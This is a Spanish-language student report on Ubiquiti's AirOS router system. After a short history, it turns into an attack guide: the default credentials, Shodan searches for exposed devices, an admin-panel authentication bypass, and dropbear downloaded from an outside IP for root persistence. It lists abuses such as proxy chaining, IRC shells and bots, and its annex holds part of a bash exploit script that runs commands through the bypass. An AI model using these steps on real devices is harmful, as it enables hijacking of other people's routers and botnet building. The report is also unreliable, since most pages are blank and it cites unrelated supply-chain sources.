Sistema Operativo AIROS
Sistema Operativo AIROS
Sistema Operativo AIROS
PROMOCIN:
Forjadores de la Paz
TEMA: SISTEMA OPERATIVO AIROS
SECCION V
Conviccin
1
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
DEDICATORIA
Dirigimos esta investigacin a nuestras familia, por
ser los seres ms importantes en vida, y ante ello
debemos nuestro forjar y desarrollo profesional
2
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
PRESENTACIN
3
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
NDICE
Portada 01
Dedicatoria 02
ndice 03
Introduccin 04
Conclusiones 16
Bibliografa 17
Anexos 18-19
4
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
INTRODUCCION
AirOS de Ubiquiti fue diseado con el objetivo de ser simple pero con mltiples
posibilidades. A diferencia de otros sistemas inalmbricos u otros sistemas Ubiquiti
se basa en un sistema operativo avanzado capaz de manejar un sistema inalmbrico
y con funciones de enrutamiento, pero desarrollado con una interfaz de usuario
simple, limpia e intuitiva.
5
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
Resea Historica
Ubiquiti Networks, Inc., es una compaa estadounidense proveedora de tecnologa
disruptiva para la creacin de redes inalmbricas. Ubiquiti se dedica principalmente
al diseo de hardware de redes inalmbricas, tanto para la comunicacin a largas
distancias, como para el despliegue de
pequeas redes Wi-Fi, priorizando la innovacin
y el alto rendimiento a bajo coste. Sus principales
clientes son proveedores WISP y empresas
dedicadas al despliegue de redes. La empresa
se fund en 2003, y entr formalmente en el
mercado de la tecnologa inalmbrica en junio de
2005.
Hablemo un poco del hardware. Las CPU's de los sistemas AirOS son procesadores
mips (Microprocessor without Interlocked Pipeline Stages). Es una arquitectura que
consume muy pocos recursos y tiene una funcionalidad aceptable. Al ser de
arquitectura distinta a la de los PC's convencionales (generalmente de 32 o 64 bits),
si queremos compilar algo para mips, necesitamos recurrir a la crosscompilacin, es
6
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
7
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
8
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
9
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
10
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
11
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
12
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
13
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
Explotacin
El usuario y la contrasea por defecto de los AirOS son:
o Usuario: ubnt
o Contrasea: ubnt
Se recomienda usar Shodan para la bsqueda de dispositivos AirOS, pero este tipo
de bsquedas dejan escapar muchos dispositivos. Actualmente trabajamos en un
scanner por rangos de IP para localizar todos.
Se puede observar que el error consiste en cambiar la url de una peticin de login al
cgi; /login.cgi/uri=/ por /admin.cgi/$vuln .
Siendo $vuln cualquiera de los sientes: *.ico *.gif, *.jpg, *.js, *.css,
airview.jar.pack.gz, airview_manager.jnlp, airview.jnlp, airview.uavr.
Por ejemplo: http://IPairos/admin.cgi/lol.css
De esta forma conseguimos el panel de administracin, para muchos el fin, pero esto
es solo el principio.
Postexplotacin
El sistema operativo que lleva montado, por defecto solo tiene permisos de lectura
en la mayora de los directorios del dispositivo. Pero en /etc hay permisos de
escritura, as pues tenemos un /etc/persistent/ a modo de home en el dispositivo. Lo
primero es tener consola root en el dispositivo, para poder tener el control total. A
travs del panel subimos y ejecutamos dropbear mas su respectiva key
crosscompilados.
14
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
http://5.175.223.63/bin/
Y empaquetado en .tar:
http://5.175.223.63/bin.tar
Incluso podramos incluir algunos ms como ngircd (Un pequeo servidor IRC), o lo
que se nos ocurra.
Aplicaciones
Algunas de las cosas que se pueden hacer con estos dispositivos son:
o Encadenar AirOS a modo de proxys (SSH Tunneling).
o Shells de IRC.
o Bots.
o Servidor IRC.
o Servidor Web/ftp/etc
o Y muchas otras que podais imaginar.
15
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
./airosh IPairos
El script se ejecutar y automticamente comprobar si el dispositivo es vulnerable.
Si es as, proceder a subir Dropbear, y a cambiar las claves de acceso, con
contrasea:lol. De esta forma, habremos conseguido el acceso al dispositivo como
administrador.
16
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
CONCLUSIONES
17
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
BIBLIOGRAFIA
Fuente
http://www.monografias.com/trabajos94/cadena-suministros-
gestion/cadena-suministros-gestion.shtml#ixzz4Z9ulFUOF
Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-suministro/gestion-
cadena-de-suministro.shtml#ixzz4Z9vWSrAN
Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-suministro/gestion-
cadena-de-suministro.shtml#ixzz4ZAIPGpEg
Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-
suministro/gestioncadena-de-suministro.shtml#ixzz4ZAIhuPaY
Fuente
http://www.monografias.com/trabajos94/gestion-cadena-de-
suministro/gestion-cadena-de-suministro.shtml#ixzz4ZAJ55CH7
Fuente
http://www.monografias.com/trabajos31/cadena-suministros/cadena-
suministros.shtml#ixzz4ZALDeNSy
ANEXOS
#!/bin/bash
18
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
host=$1
portlocal=$2
hostfinal=$3
portfinal=$4
unset c
usage() {
# ./airosh IP
exit 1
}
[[ -z "$host" ]] && c=1
[[ -z "$portlocal" ]] && c=2
[[ -z "$hostfinal" ]] && c=2
[[ -z "$portfinal" ]] && c=2
if [[ $c = 1 ]]; then
echo "FAILED!"
usage
else
echo "OK"
fi
runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; }
2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!' -A 99999 |
tail -n +5 | tac | tail -n +7 | tac; }
19
ESCUELA DE EDUCACION TECNICA PROFESIONAL PNP
20